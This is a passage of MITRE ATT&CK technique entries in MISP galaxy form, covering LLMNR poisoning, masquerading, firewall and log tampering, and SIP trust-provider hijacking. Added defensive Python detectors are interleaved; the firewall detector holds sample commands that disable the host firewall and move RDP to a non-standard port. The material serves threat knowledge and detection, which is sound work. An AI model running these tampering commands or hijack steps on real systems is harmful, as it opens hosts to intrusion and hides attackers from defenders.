The tag is: misp-galaxy:mitre-attack-pattern="SSL certificate acquisition for trust breaking - T1338"

Table 5376. Table References

Links

https://attack.mitre.org/techniques/T1338

Identify resources required to build capabilities - T1348

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1348).

As with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in house, can be developed, or may need to be contracted out. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Identify resources required to build capabilities - T1348"

Table 5377. Table References

Links

https://attack.mitre.org/techniques/T1348

Hardware or software supply chain implant - T1365

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1365).

During production and distribution, an adversary places software, firmware, or a CPU chip in a computer, handheld, or other electronic device that later enables the adversary to gain unauthorized access. (Citation: McDRecall) (Citation: SeagateMaxtor)

The tag is: misp-galaxy:mitre-attack-pattern="Hardware or software supply chain implant - T1365"

Table 5378. Table References

Links

https://attack.mitre.org/techniques/T1365

Test malware in various execution environments - T1357

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1357).

Malware may perform differently on different platforms (computer vs handheld) and different operating systems ([Ubuntu](http://www.ubuntu.com) vs [OS X](http://www.apple.com/osx)), and versions ([Windows](http://windows.microsoft.com) 7 vs 10) so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)

The tag is: misp-galaxy:mitre-attack-pattern="Test malware in various execution environments - T1357"

Table 5379. Table References

Links

https://attack.mitre.org/techniques/T1357

Conduct social engineering or HUMINT operation - T1376

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering or HUMINT operation - T1376"

Table 5380. Table References

Links

https://attack.mitre.org/techniques/T1376

Spear phishing messages with malicious attachments - T1367

This technique has been deprecated. Please use [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).

Emails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with malicious attachments - T1367"

Table 5381. Table References

Links

https://attack.mitre.org/techniques/T1367

Authorized user performs requested cyber action - T1386

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Clicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)

The tag is: misp-galaxy:mitre-attack-pattern="Authorized user performs requested cyber action - T1386"

Table 5382. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1386

Spear phishing messages with text only - T1368

This technique has been deprecated. Please use [Phishing](https://attack.mitre.org/techniques/T1566) where appropriate.

Emails with text-only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow-on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm the existence of an account or user. (Citation: Paypal Phone Scam)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with text only - T1368"

Table 5383. Table References

Links

https://attack.mitre.org/techniques/T1368

Spear phishing messages with malicious links - T1369

This technique has been deprecated. Please use [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002).

Emails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)

The tag is: misp-galaxy:mitre-attack-pattern="Spear phishing messages with malicious links - T1369"

Table 5384. Table References

Links

https://attack.mitre.org/techniques/T1369

Unauthorized user introduces compromise delivery mechanism - T1387

This technique has been deprecated. Please use [Hardware Additions](https://attack.mitre.org/techniques/T1200) where appropriate.

If an adversary can gain physical access to the target’s environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. (Citation: Credit Card Skimmers)

The tag is: misp-galaxy:mitre-attack-pattern="Unauthorized user introduces compromise delivery mechanism - T1387"

Table 5385. Table References

Links

https://attack.mitre.org/techniques/T1387

Deliver Malicious App via Other Means - T1476

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to the increased risk of detection or for other reasons. However, mobile devices are often configured to allow application installation only from an authorized app store, which would prevent this technique from working.

Delivery methods for the malicious application include:

  • [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) - Including the mobile app package as an attachment to an email message.

  • [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.

  • Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)

Some Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)

The tag is: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476"

Table 5386. Table References

Links

https://attack.mitre.org/techniques/T1476

https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/

https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html

https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861

https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

Upload, install, and configure software/tools - T1362

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1362).

An adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)

The tag is: misp-galaxy:mitre-attack-pattern="Upload, install, and configure software/tools - T1362"

Table 5387. Table References

Links

https://attack.mitre.org/techniques/T1362

LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.

Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)

Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 challenge-response (commonly called the Net-NTLMv2 hash; it is not the NT hash and cannot be passed directly) will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.

In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.

Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)
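The detection that follows from this is the one Conveigh (listed in the references) implements: send an LLMNR query for a hostname that cannot exist on the network and treat any answer as evidence of a poisoner, because only a spoofer replies to everything. The code below is an added example, not part of ATT&CK, MISP or Conveigh: it builds the query in DNS wire format, parses a response, and, so that it runs offline, constructs a stand-in for the spoofed reply a tool such as Responder would send. The live probe_once() function is the only part that touches the network and is not called by the demo.

```python
"""Conveigh-style LLMNR poisoner detection: ask for a hostname that cannot exist and
treat any answer as evidence of a spoofer. Added example, not ATT&CK or MISP code."""
import random
import socket
import string
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # LLMNR IPv4 multicast group and UDP port


def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def build_llmnr_query(name, txid):
    """DNS wire format: header (ID, flags=0, QD=1), then one question of type A, class IN."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)


def parse_name(data, off):
    labels = []
    while True:
        ln = data[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0 == 0xC0:                       # compression pointer (RFC 1035 4.1.4)
            ptr = struct.unpack("!H", data[off - 1:off + 1])[0] & 0x3FFF
            tail, _ = parse_name(data, ptr)
            labels.append(tail)
            return ".".join(labels), off + 1
        labels.append(data[off:off + ln].decode("ascii", "replace"))
        off += ln
    return ".".join(labels), off


def parse_llmnr_response(data):
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if not flags & 0x8000:                          # QR bit clear: a query, not a response
        return None
    off, qname, answers = 12, None, []
    for _ in range(qd):
        qname, off = parse_name(data, off)
        off += 4                                    # skip QTYPE and QCLASS
    for _ in range(an):
        _, off = parse_name(data, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append(".".join(str(b) for b in rdata))
    return {"id": txid, "name": qname, "answers": answers}


def honeypot_name(rng=random):
    return "".join(rng.choices(string.ascii_lowercase, k=12))   # no real host has this name


def detect_poisoner(query_name, txid, response, src_ip):
    """Any A-record answer for the honeypot name is the indicator: only a spoofer replies."""
    r = parse_llmnr_response(response)
    if r and r["id"] == txid and (r["name"] or "").lower() == query_name.lower() and r["answers"]:
        return {"poisoner": src_ip, "claims": r["answers"], "name": query_name}
    return None


def build_spoofed_response(query, answer_ip):
    """Constructed stand-in for what a poisoner such as Responder sends back, so the demo
    runs offline: echo the question, add one A record pointing at the poisoner."""
    txid = struct.unpack("!H", query[:2])[0]
    qname, off = parse_name(query, 12)
    question = query[12:off + 4]
    rr = encode_name(qname) + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(answer_ip)
    return struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0) + question + rr


def probe_once(timeout=2.0):
    """Live probe: send one honeypot query to the LLMNR group and report any responder."""
    name, txid = honeypot_name(), random.randrange(1, 0xFFFF)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    s.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    try:
        data, (src, _) = s.recvfrom(512)
        return detect_poisoner(name, txid, data, src)
    except socket.timeout:
        return None
    finally:
        s.close()


if __name__ == "__main__":
    q = build_llmnr_query("zqxwvutsrpon", 0x1234)
    print(detect_poisoner("zqxwvutsrpon", 0x1234, build_spoofed_response(q, "10.0.0.66"), "10.0.0.66"))
```

The same probe works for NBT-NS on UDP 137 with a NetBIOS name query instead of the DNS-format one. Note that the detector identifies the poisoner's IP but not which victims already leaked credentials; for that, alert on outbound SMB/HTTP authentication to the reported address.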

The tag is: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001"

Table 5388. Table References

Links

https://attack.mitre.org/techniques/T1557/001

https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution

https://github.com/Kevin-Robertson/Conveigh

https://github.com/SpiderLabs/Responder

https://github.com/nomex/nbnspoof

https://technet.microsoft.com/library/cc958811.aspx

https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response

https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning

Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003

Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003"

Table 5389. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1048/003

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689

Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001

Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001"

Table 5390. Table References

Links

https://attack.mitre.org/techniques/T1639/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html

Match Legitimate Name or Location - T1036.005

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.
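A hunt for the two variants described above (a trusted name in the wrong directory, and a near-miss name such as svch0st.exe), as an added example that is not part of ATT&CK, MISP or the Elastic post it parallels. The expected-location map and the process list are constructed for the demo; a real hunt derives the map from a golden image and feeds it process-creation telemetry. The same near-miss comparison applies to container image names.

```python
"""Hunt for masqueraded binaries: known names in the wrong directory, and look-alike names.
Added example, not ATT&CK or MISP code. The expected-location map and sample process list
are constructed for the demo; a real hunt builds the map from a golden image."""
from difflib import SequenceMatcher

EXPECTED_DIRS = {   # assumed expected locations for commonly mimicked binaries
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
    "csrss.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows", r"c:\windows\syswow64"},
    "rundll32.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}

SAMPLE_PROCESSES = [   # constructed
    r"C:\Windows\System32\svchost.exe",
    r"C:\Users\Public\svchost.exe",
    r"C:\Windows\Temp\svch0st.exe",
    r"C:\Windows\System32\lsass.exe",
    r"C:\ProgramData\lsasss.exe",
    r"C:\Windows\explorer.exe",
    r"C:\Windows\System32\explorer.exe",
    r"C:\Program Files\Vendor\updater.exe",
]


def split_path(path):
    directory, _, name = path.replace("/", "\\").rpartition("\\")
    return directory.lower(), name.lower()


def similarity(a, b):
    return SequenceMatcher(None, a, b).ratio()   # 1.0 = identical; svch0st.exe vs svchost.exe ~0.91


def hunt_masquerades(paths, lookalike_threshold=0.8):
    """Return (path, reason, mimicked_name). Exact known names are checked against their
    expected directories; any other name is compared to the known list for look-alikes."""
    findings = []
    for path in paths:
        directory, name = split_path(path)
        if name in EXPECTED_DIRS:
            if directory not in EXPECTED_DIRS[name]:
                findings.append((path, "wrong-location", name))
            continue
        closest = max(EXPECTED_DIRS, key=lambda known: similarity(name, known))
        if similarity(name, closest) >= lookalike_threshold:
            findings.append((path, "lookalike-name", closest))
    return findings


if __name__ == "__main__":
    for path, reason, mimicked in hunt_masquerades(SAMPLE_PROCESSES):
        print(f"{reason:15} {path}  (mimics {mimicked})")
```

Path and name checks are cheap but evadable; a binary that copies the real name and location of a legitimate file and only differs in content is caught by the signature and hash checks, not by this hunt, so run both.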

The tag is: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"

Table 5391. Table References

Links

https://attack.mitre.org/techniques/T1036/005

https://docs.docker.com/engine/reference/commandline/images/

https://twitter.com/ItsReallyNick/status/1055321652777619457

https://www.elastic.co/blog/how-hunt-masquerade-ball

Match Legitimate Name or Location - T1655.001

Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by giving artifacts the name and icon of a legitimate, trusted application (e.g., Settings), or using a package name that matches legitimate, trusted applications (e.g., com.google.android.gm).

Adversaries may also use the same icon of the file or application they are trying to mimic.

The tag is: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1655.001"

Table 5392. Table References

Links

https://attack.mitre.org/techniques/T1655/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

Disable or Modify System Firewall - T1562.004

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less scrutinized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
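The RDP-on-a-new-port case, seen from the defender's side, as an added example that is not part of ATT&CK or MISP: moving RDP requires changing the PortNumber value under the RDP-Tcp WinStation key and then admitting that port through the host firewall, so the two command lines are correlated per host. The script also flags the blunter variant of turning the firewall off. Events, field names and the one-hour correlation window are constructed assumptions for the demo.

```python
"""Spot RDP being moved to a non-standard port and let through the host firewall,
from process command lines. Added example, not ATT&CK or MISP code. Events are
constructed; the field names and the one-hour correlation window are assumptions."""
import re
from collections import defaultdict

RE_FW_OFF = re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)
RE_FW_ADD = re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b(?P<args>.*)", re.I)
RE_RDP_PORT = re.compile(
    r"reg(?:\.exe)?\s+add\s+\"?(?:HKLM|HKEY_LOCAL_MACHINE)\\SYSTEM\\CurrentControlSet\\Control\\"
    r"Terminal Server\\WinStations\\RDP-Tcp\"?.*?/v\s+PortNumber\b.*?/d\s+(?P<port>0x[0-9a-f]+|\d+)",
    re.I)


def parse_allow_rule(args):
    """Return the local port of an inbound allow rule, None for any other rule."""
    if not (re.search(r"\bdir=in\b", args, re.I) and re.search(r"\baction=allow\b", args, re.I)):
        return None
    m = re.search(r"\blocalport=(\d+)\b", args, re.I)
    return int(m.group(1)) if m else None


def analyze(events, window_s=3600):
    """Return (host, severity, message); an allow rule whose port matches a recent
    RDP PortNumber change on the same host is rated high, other allow rules medium."""
    findings = []
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    for host, evs in by_host.items():
        rdp_changes, rules = [], []
        for e in sorted(evs, key=lambda e: e["ts"]):
            cmd = e["cmdline"]
            if RE_FW_OFF.search(cmd):
                findings.append((host, "high", "host firewall disabled: " + cmd))
            elif (m := RE_RDP_PORT.search(cmd)):
                rdp_changes.append((e["ts"], int(m.group("port"), 0)))   # accepts 3390 and 0xd3e
            elif (m := RE_FW_ADD.search(cmd)):
                port = parse_allow_rule(m.group("args"))
                if port is not None:
                    rules.append((e["ts"], port))
        for rts, port in rules:
            if any(p == port and abs(rts - cts) <= window_s for cts, p in rdp_changes):
                findings.append((host, "high", f"RDP moved to {port} and inbound rule added for it"))
            else:
                findings.append((host, "medium", f"inbound allow rule added for port {port}"))
    return findings


SAMPLE_EVENTS = [   # constructed process-creation events
    {"host": "WS07", "ts": 1700000100, "cmdline":
        r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0xd3e /f'},
    {"host": "WS07", "ts": 1700000160, "cmdline":
        'netsh advfirewall firewall add rule name="RDP alt" dir=in action=allow protocol=TCP localport=3390'},
    {"host": "WS07", "ts": 1700000170, "cmdline": "netsh advfirewall set allprofiles state off"},
    {"host": "WS08", "ts": 1700000500, "cmdline":
        'netsh advfirewall firewall add rule name="Vendor agent" dir=in action=allow protocol=TCP localport=8443'},
    {"host": "WS08", "ts": 1700000510, "cmdline": "netsh interface ipv4 show config"},
]

if __name__ == "__main__":
    for host, sev, msg in analyze(SAMPLE_EVENTS):
        print(f"{host} [{sev}] {msg}")
```

Command-line matching misses the same change made through PowerShell (New-NetFirewallRule, Set-ItemProperty) or direct registry API calls, so back it with Windows Security events 4946/4947 (rule added/modified) and registry-modification telemetry on the RDP-Tcp key.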

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004"

Table 5393. Table References

Links

https://attack.mitre.org/techniques/T1562/004

https://twitter.com/TheDFIRReport/status/1498657772254240768

Disable or Modify Cloud Firewall - T1562.007

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004).

Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)

Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Firewall - T1562.007"

Table 5394. Table References

Links

https://attack.mitre.org/techniques/T1562/007

https://expel.io/blog/finding-evil-in-aws/

https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/

Disable or Modify Cloud Logs - T1562.008

An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.

For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Cloud Logs - T1562.008"

Table 5395. Table References

Links

https://attack.mitre.org/techniques/T1562/008

https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html

https://cloud.google.com/logging/docs/audit/configure-data-access

https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html

https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete

https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/

https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detectiondisruption/main.py

https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591

SIP and Trust Provider Hijacking - T1553.003

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file’s origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).

  • Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}</code> that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.

  • Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).

  • Note: The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)

The tag is: misp-galaxy:mitre-attack-pattern="SIP and Trust Provider Hijacking - T1553.003"

Table 5396. Table References

Links

http://www.entrust.net/knowledge-base/technote.cfm?tn=8165

https://attack.mitre.org/techniques/T1553/003

https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)

https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files

https://github.com/mattifestation/PoCSubjectInterfacePackage

https://msdn.microsoft.com/library/ms537359.aspx

https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx

https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

Windows Management Instrumentation Event Subscription - T1546.003

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer’s uptime.(Citation: Mandiant M-Trends 2015)

